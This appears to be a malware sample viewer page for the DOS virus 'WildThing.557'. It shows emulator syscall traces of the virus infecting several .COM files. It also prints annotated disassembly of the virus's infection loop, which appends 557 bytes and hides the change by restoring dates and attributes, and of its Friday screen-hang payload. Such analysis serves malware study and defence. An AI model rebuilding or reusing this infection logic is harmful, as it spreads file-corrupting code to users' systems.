Sample viewer

vx.netlux.org/Virus.DOS.WildThing.557


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:11:38.75839692Z 26 PC: 12f84 | Set disk transfer address
2018-12-17T22:11:38.760524932Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
; Directory-scan loop of the sample, disassembled at the traced PC (Intel syntax, 16-bit DOS code).
; The listing starts mid-routine and stops before the last int 0x21.
; Every data reference is bp-relative; bp presumably holds the code's own base offset
; (its setup is not shown here, TODO confirm).
0x12e4d: je 0x12e46                         ; DH == 0 after the "Get time" call (cmp dh, 0 at 0x12e4a): back to 0x12e46 (not shown; presumably re-reads the clock)
0x12e4f: mov byte ptr [bp + 0x32e], dh      ; keep the non-zero DH (seconds field of INT 21h/2Ch) in a bp-relative variable
0x12e53: mov ah, 0x47                       ; INT 21h AH=47h: get current directory
0x12e55: mov dl, 0                          ; DL = 0 selects the default drive
0x12e57: lea si, word ptr [bp + 0x34a]      ; DS:SI = buffer that receives the path
0x12e5b: int 0x21                           ; logged in the trace as "Get current directory" (PC 12e5d)
0x12e5d: call 0x12f46                       ; callee issues "Get date" (trace PC 12f4a) and tests the weekday; entry 0x12f46 itself is not shown
0x12e60: call 0x12f6a                       ; callee runs a "Find first file" on the filespec at bp+0x2d1 (trace PC 12f75)
0x12e63: mov ah, 0x4e                       ; INT 21h AH=4Eh: find first matching file
0x12e65: lea dx, word ptr [bp + 0x2cb]      ; DS:DX = filespec string (contents not shown; the trace only shows .COM files being opened)
0x12e69: mov cx, 7                          ; attribute mask 7 = read-only | hidden | system, so such files are matched too
0x12e6c: int 0x21                           ; shared by find-first and find-next (jmp at 0x12e79 re-enters here)
0x12e6e: jb 0x12e7b                         ; CF set = no (more) matches: leave the loop
0x12e70: lea dx, word ptr [bp + 0x3a8]      ; DS:DX = name of the file just found (presumably the filename field of the DTA, TODO confirm)
0x12e74: call 0x12eaf                       ; per-file routine (not shown). The trace rows at PC 12eb5..12f3a show it changing
                                            ; attributes, opening the file, reading 3 bytes, writing 3 and 557 bytes, and calling
                                            ; get/set date-time and attributes again before returning; file size growth is the visible artefact.
0x12e77: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next matching file
0x12e79: jmp 0x12e6c                        ; loop until DOS reports no further match
0x12e7b: lea dx, word ptr [bp + 0x2e1]      ; DS:DX = directory path string (contents not shown)
0x12e7f: mov ah, 0x3b                       ; INT 21h AH=3Bh: change directory; the int 0x21 follows after the listing ends (trace PC 12e83)
2018-12-17T22:11:38.763073225Z 71 PC: 12e5d | Get current directory
2018-12-17T22:11:38.766182771Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
; Date check and screen payload of the sample, followed by the start of a find-first helper
; (Intel syntax, 16-bit DOS code). The listing starts after the "Get date" call and is cut
; off before 0x12f78.
0x12f4c: je 0x12f4f                         ; AL == 5 (cmp al, 5 at 0x12f4a): INT 21h/2Ah returns the weekday in AL, 0 = Sunday, so 5 = Friday
0x12f4e: ret                                ; any other weekday: return to the caller without touching the screen
0x12f4f: mov ah, 1                          ; INT 10h AH=01h: set text cursor shape
0x12f51: mov cx, 0x2020                     ; CH = 0x20 has bit 5 set, which hides the cursor
0x12f54: int 0x10
0x12f56: mov ah, 2                          ; INT 10h AH=02h: set cursor position
0x12f58: xor dx, dx                         ; DH = row 0, DL = column 0
0x12f5a: int 0x10
0x12f5c: xor ax, ax                         ; AH=00h set video mode, AL = mode 0
0x12f5e: int 0x10
0x12f60: mov ah, 9                          ; INT 21h AH=09h: print '$'-terminated string
0x12f62: lea dx, word ptr [bp + 0x271]      ; DS:DX = message text (contents not shown in this listing)
0x12f66: int 0x21
0x12f68: jmp 0x12f68                        ; jumps to itself: the machine hangs here until reset
; NOTE(review): no "Display string" row with PC 12f68 appears in the traces on this page, so this
; branch was apparently not taken in the recorded runs.
0x12f6a: mov ah, 0x4e                       ; separate helper (called from 0x12e60): INT 21h AH=4Eh find first
0x12f6c: lea dx, word ptr [bp + 0x2d1]      ; DS:DX = filespec string (contents not shown)
0x12f70: mov cx, 7                          ; attribute mask 7 = read-only | hidden | system
0x12f73: int 0x21                           ; logged in the trace as "Find first file" (PC 12f75)
0x12f75: jae 0x12f78                        ; CF clear = a match was found: continue at 0x12f78 (not shown)
2018-12-17T22:11:38.770062345Z 78 PC: 12f75 | Find first file
2018-12-17T22:11:38.775849492Z 78 PC: 12e6e | Find first file
2018-12-17T22:11:38.781828478Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:38.801512973Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.106767922Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:11:39.113322753Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.116746241Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.124377849Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.125796718Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.132202294Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.134287633Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.142888131Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.145537251Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.154605702Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.164518136Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.167485869Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.174368608Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.184147431Z 61 PC: 12ec9 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:11:39.190581529Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.193220698Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.199968649Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.201628182Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.204883647Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.206564195Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.215321441Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.217482709Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.22535943Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.239139486Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.243925369Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.249984792Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.259959081Z 61 PC: 12ec9 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:11:39.272046625Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.275180923Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.28191653Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.283346196Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.286196872Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.287770693Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.296157996Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.298055007Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.305673678Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.315788699Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.318699017Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.324276636Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.3338074Z 61 PC: 12ec9 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:11:39.346766948Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.348475327Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.355200759Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.358359533Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.361024771Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.36306162Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.372242082Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.374407166Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.382251721Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.392424761Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.396175276Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.402082875Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.412429367Z 61 PC: 12ec9 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:11:39.420178269Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.421549914Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.427861049Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.429803638Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.432306408Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.433919844Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.4437674Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.445327358Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.458727829Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.46905089Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.471802359Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.478147931Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.488658598Z 61 PC: 12ec9 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:11:39.494837361Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.4960699Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.502894132Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.504361935Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.506955677Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.509237869Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.522865518Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.525048596Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.534645139Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.546111076Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.549044505Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.555912237Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.565758391Z 61 PC: 12ec9 | Open file (Filename = 'PAH.COM')
2018-12-17T22:11:39.572746729Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.57591742Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.582429051Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.583837119Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:11:39.586007028Z 66 PC: 12f45 | Move file pointer
2018-12-17T22:11:39.587666313Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-17T22:11:39.594506504Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.596502323Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.602524654Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.610145247Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.612793812Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T22:11:39.616903016Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T22:11:39.624093347Z 61 PC: 12ec9 | Open file (Filename = 'TEST.COM')
2018-12-17T22:11:39.630454974Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T22:11:39.632211539Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:11:39.637407438Z 87 PC: 12f2c | Get or set file date and time
2018-12-17T22:11:39.639716958Z 62 PC: 12f30 | Close file
2018-12-17T22:11:39.64552174Z 67 PC: 12f3a | Get or set file attributes
2018-12-17T22:11:39.652804158Z 79 PC: 12e6e | Find next file
2018-12-17T22:11:39.6556176Z 59 PC: 12e83 | Change current directory
2018-12-17T22:11:39.660108173Z 59 PC: 12e8d | Change current directory
2018-12-17T22:11:39.661732489Z 26 PC: 12f84 | Set disk transfer address
2018-12-17T22:11:39.663287231Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-17T22:11:41.861582864Z 72 PC: 8f1b9 | Allocate memory
2018-12-17T22:11:41.863619468Z 72 PC: 8f1bd | Allocate memory
2018-12-17T22:11:41.866977458Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-17T22:11:41.877753226Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-17T22:11:41.889517861Z 66 PC: 91f95 | Move file pointer
2018-12-17T22:11:41.891940838Z 62 PC: 91fc1 | Close file
2018-12-17T22:11:41.894494026Z 75 PC: 91fe0 | Execute program
2018-12-17T22:11:41.910470347Z 98 PC: 916f1 | Get current PSP
2018-12-17T22:11:41.911868679Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-17T22:11:41.91733679Z 48 PC: c609 | Get DOS version
2018-12-17T22:11:41.920594907Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-17T22:11:41.92363717Z 2 PC: c38c | Character output (Char = '32')
2018-12-17T22:11:41.925968312Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-17T22:11:41.929994655Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-17T22:11:41.933679091Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-17T22:11:41.938498037Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\SMARTDRV.EXE')
2018-12-17T22:11:41.950410593Z 66 PC: 91f95 | Move file pointer
2018-12-17T22:11:41.952034591Z 62 PC: 91fc1 | Close file
2018-12-17T22:11:41.954582714Z 75 PC: 91fe0 | Execute program
2018-12-17T22:11:41.96984287Z 98 PC: 916f1 | Get current PSP
2018-12-17T22:11:41.9732905Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-17T22:11:41.975151439Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:11:41.976155756Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:11:41.977476433Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:41.978998618Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:41.980116255Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-17T22:11:41.985076752Z 62 PC: 8f8eb | Close file
2018-12-17T22:11:41.986724029Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:41.995398332Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:41.996667511Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:41.99912222Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.000316057Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.001458761Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.004098525Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.005538747Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.007236294Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.010204547Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.012005584Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.013696853Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.022613099Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.024058539Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.025686741Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.028042716Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.029886991Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.031639393Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.034804578Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.036388718Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.038120863Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.041071948Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.042606474Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.044283166Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.046338852Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.048485455Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.050215713Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.053379733Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.054684Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.056107368Z 62 PC: 8f8f2 | Close file
2018-12-17T22:11:42.058492069Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-17T22:11:42.063149318Z 62 PC: 8f90e | Close file
2018-12-17T22:11:42.065125911Z 69 PC: 8f915 | Duplicate handle
2018-12-17T22:11:42.067165463Z 69 PC: 8f919 | Duplicate handle
2018-12-17T22:11:42.068450663Z 61 PC: 9387b | Open file (Filename = '')
2018-12-17T22:11:42.071946729Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-17T22:11:42.074149046Z 61 PC: 9387b | Open file (Filename = '')
2018-12-17T22:11:42.077655444Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-17T22:11:42.079105452Z 74 PC: 8f9c4 | Reallocate memory
2018-12-17T22:11:42.080683018Z 72 PC: 8f9e0 | Allocate memory
2018-12-17T22:11:42.081950511Z 72 PC: 8f9e4 | Allocate memory
2018-12-17T22:11:42.083316665Z 74 PC: 8f9fb | Reallocate memory
2018-12-17T22:11:42.084817227Z 72 PC: 8fa02 | Allocate memory
2018-12-17T22:11:42.086529119Z 72 PC: 8fa06 | Allocate memory
2018-12-17T22:11:42.088210475Z 73 PC: 8fa11 | Release memory
2018-12-17T22:11:42.089799115Z 73 PC: 8efea | Release memory
2018-12-17T22:11:42.090795049Z 74 PC: 8f003 | Reallocate memory
2018-12-17T22:11:42.093277441Z 72 PC: 8f054 | Allocate memory
2018-12-17T22:11:42.095269278Z 72 PC: 8f058 | Allocate memory
2018-12-17T22:11:42.097118808Z 73 PC: 8f060 | Release memory
2018-12-17T22:11:42.098861405Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-17T22:11:42.107905437Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:11:42.111747753Z 66 PC: 8f0ad | Move file pointer
2018-12-17T22:11:42.113898355Z 62 PC: 8f0d1 | Close file
2018-12-17T22:11:42.116183772Z 75 PC: 8f0f2 | Execute program
2018-12-17T22:11:42.136852646Z 80 PC: 12be9 | Set current PSP
2018-12-17T22:11:42.137715286Z 48 PC: 12bee | Get DOS version
2018-12-17T22:11:42.139729805Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-17T22:11:42.141639193Z 101 PC: 12c74 | Get extended country info
2018-12-17T22:11:42.142663669Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-17T22:11:42.144360723Z 74 PC: 12cdc | Reallocate memory
2018-12-17T22:11:42.145650937Z 72 PC: 1355d | Allocate memory
2018-12-17T22:11:42.147063697Z 25 PC: 13596 | Get default drive
2018-12-17T22:11:42.148550135Z 71 PC: 135ad | Get current directory
2018-12-17T22:11:42.150833281Z 59 PC: 135ba | Change current directory
2018-12-17T22:11:42.1554479Z 59 PC: 135c8 | Change current directory
2018-12-17T22:11:42.159040531Z 59 PC: 135d3 | Change current directory
2018-12-17T22:11:42.161286178Z 25 PC: 12d13 | Get default drive
2018-12-17T22:11:42.162862409Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-17T22:11:42.163873726Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:11:42.164746224Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:11:42.166966011Z 80 PC: 1301d | Set current PSP
2018-12-17T22:11:42.167805313Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-17T22:11:42.168831875Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:42.170289118Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:11:42.171321599Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-17T22:11:42.172564602Z 72 PC: 130ec | Allocate memory
2018-12-17T22:11:42.174679022Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-17T22:11:42.179404915Z 62 PC: 131ba | Close file
2018-12-17T22:11:42.181426012Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-17T22:11:42.183798077Z 74 PC: 1197c | Reallocate memory
2018-12-17T22:11:42.184955439Z 72 PC: 11991 | Allocate memory
2018-12-17T22:11:42.186263252Z 73 PC: 119b2 | Release memory
2018-12-17T22:11:42.188357618Z 72 PC: 119bd | Allocate memory
2018-12-17T22:11:42.189723611Z 73 PC: 119df | Release memory
2018-12-17T22:11:42.190807399Z 72 PC: 119f5 | Allocate memory
2018-12-17T22:11:42.192743462Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":2417,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:47.325261287Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:47.327468816Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
; Directory-scan loop of the sample, disassembled at the traced PC (Intel syntax, 16-bit DOS code).
; The listing starts mid-routine and stops before the last int 0x21.
; Every data reference is bp-relative; bp presumably holds the code's own base offset
; (its setup is not shown here, TODO confirm).
0x12e4d: je 0x12e46                         ; DH == 0 after the "Get time" call (cmp dh, 0 at 0x12e4a): back to 0x12e46 (not shown; presumably re-reads the clock)
0x12e4f: mov byte ptr [bp + 0x32e], dh      ; keep the non-zero DH (seconds field of INT 21h/2Ch) in a bp-relative variable
0x12e53: mov ah, 0x47                       ; INT 21h AH=47h: get current directory
0x12e55: mov dl, 0                          ; DL = 0 selects the default drive
0x12e57: lea si, word ptr [bp + 0x34a]      ; DS:SI = buffer that receives the path
0x12e5b: int 0x21                           ; logged in the trace as "Get current directory" (PC 12e5d)
0x12e5d: call 0x12f46                       ; callee issues "Get date" (trace PC 12f4a) and tests the weekday; entry 0x12f46 itself is not shown
0x12e60: call 0x12f6a                       ; callee runs a "Find first file" on the filespec at bp+0x2d1 (trace PC 12f75)
0x12e63: mov ah, 0x4e                       ; INT 21h AH=4Eh: find first matching file
0x12e65: lea dx, word ptr [bp + 0x2cb]      ; DS:DX = filespec string (contents not shown in this listing)
0x12e69: mov cx, 7                          ; attribute mask 7 = read-only | hidden | system, so such files are matched too
0x12e6c: int 0x21                           ; shared by find-first and find-next (jmp at 0x12e79 re-enters here)
0x12e6e: jb 0x12e7b                         ; CF set = no (more) matches: leave the loop
0x12e70: lea dx, word ptr [bp + 0x3a8]      ; DS:DX = name of the file just found (presumably the filename field of the DTA, TODO confirm)
0x12e74: call 0x12eaf                       ; per-file routine (not shown). The trace rows at PC 12eb5..12f3a show it changing
                                            ; attributes, opening the file, reading 3 bytes, writing 3 and 557 bytes, and calling
                                            ; get/set date-time and attributes again before returning; file size growth is the visible artefact.
0x12e77: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next matching file
0x12e79: jmp 0x12e6c                        ; loop until DOS reports no further match
0x12e7b: lea dx, word ptr [bp + 0x2e1]      ; DS:DX = directory path string (contents not shown)
0x12e7f: mov ah, 0x3b                       ; INT 21h AH=3Bh: change directory; the int 0x21 follows after the listing ends (trace PC 12e83)
2018-12-25T11:45:47.329553906Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:47.332236371Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
; Date check and screen payload of the sample, followed by the start of a find-first helper
; (Intel syntax, 16-bit DOS code). The listing starts after the "Get date" call and is cut
; off before 0x12f78.
0x12f4c: je 0x12f4f                         ; AL == 5 (cmp al, 5 at 0x12f4a): INT 21h/2Ah returns the weekday in AL, 0 = Sunday, so 5 = Friday
0x12f4e: ret                                ; any other weekday: return to the caller without touching the screen
0x12f4f: mov ah, 1                          ; INT 10h AH=01h: set text cursor shape
0x12f51: mov cx, 0x2020                     ; CH = 0x20 has bit 5 set, which hides the cursor
0x12f54: int 0x10
0x12f56: mov ah, 2                          ; INT 10h AH=02h: set cursor position
0x12f58: xor dx, dx                         ; DH = row 0, DL = column 0
0x12f5a: int 0x10
0x12f5c: xor ax, ax                         ; AH=00h set video mode, AL = mode 0
0x12f5e: int 0x10
0x12f60: mov ah, 9                          ; INT 21h AH=09h: print '$'-terminated string
0x12f62: lea dx, word ptr [bp + 0x271]      ; DS:DX = message text (contents not shown in this listing)
0x12f66: int 0x21
0x12f68: jmp 0x12f68                        ; jumps to itself: the machine hangs here until reset
; NOTE(review): no "Display string" row with PC 12f68 appears in this run's trace, so this
; branch was apparently not taken here.
0x12f6a: mov ah, 0x4e                       ; separate helper (called from 0x12e60): INT 21h AH=4Eh find first
0x12f6c: lea dx, word ptr [bp + 0x2d1]      ; DS:DX = filespec string (contents not shown)
0x12f70: mov cx, 7                          ; attribute mask 7 = read-only | hidden | system
0x12f73: int 0x21                           ; logged in the trace as "Find first file" (PC 12f75)
0x12f75: jae 0x12f78                        ; CF clear = a match was found: continue at 0x12f78 (not shown)
2018-12-25T11:45:47.335026214Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:47.347751295Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:47.35334427Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:47.358724862Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:47.3747871Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:47.381530825Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:47.383223332Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:47.394703155Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:47.396304837Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:47.399146937Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.40261854Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:47.410724354Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:47.412282105Z 62 PC: 12f30 | Close file
2018-12-25T11:45:47.420630142Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:47.431800105Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.434873078Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.441424119Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.451006644Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.457439522Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.458982474Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.465574976Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.466927699Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.469465141Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.471348916Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.479678399Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:47.481042402Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:47.489119214Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:47.499681604Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:47.502365021Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:47.509146428Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:47.519737736Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:47.527087682Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:47.530035186Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:47.536965263Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.538369741Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:47.542129768Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:47.544285275Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:47.552286041Z 87 PC: 12f2c | Get or set file date and time (See above)
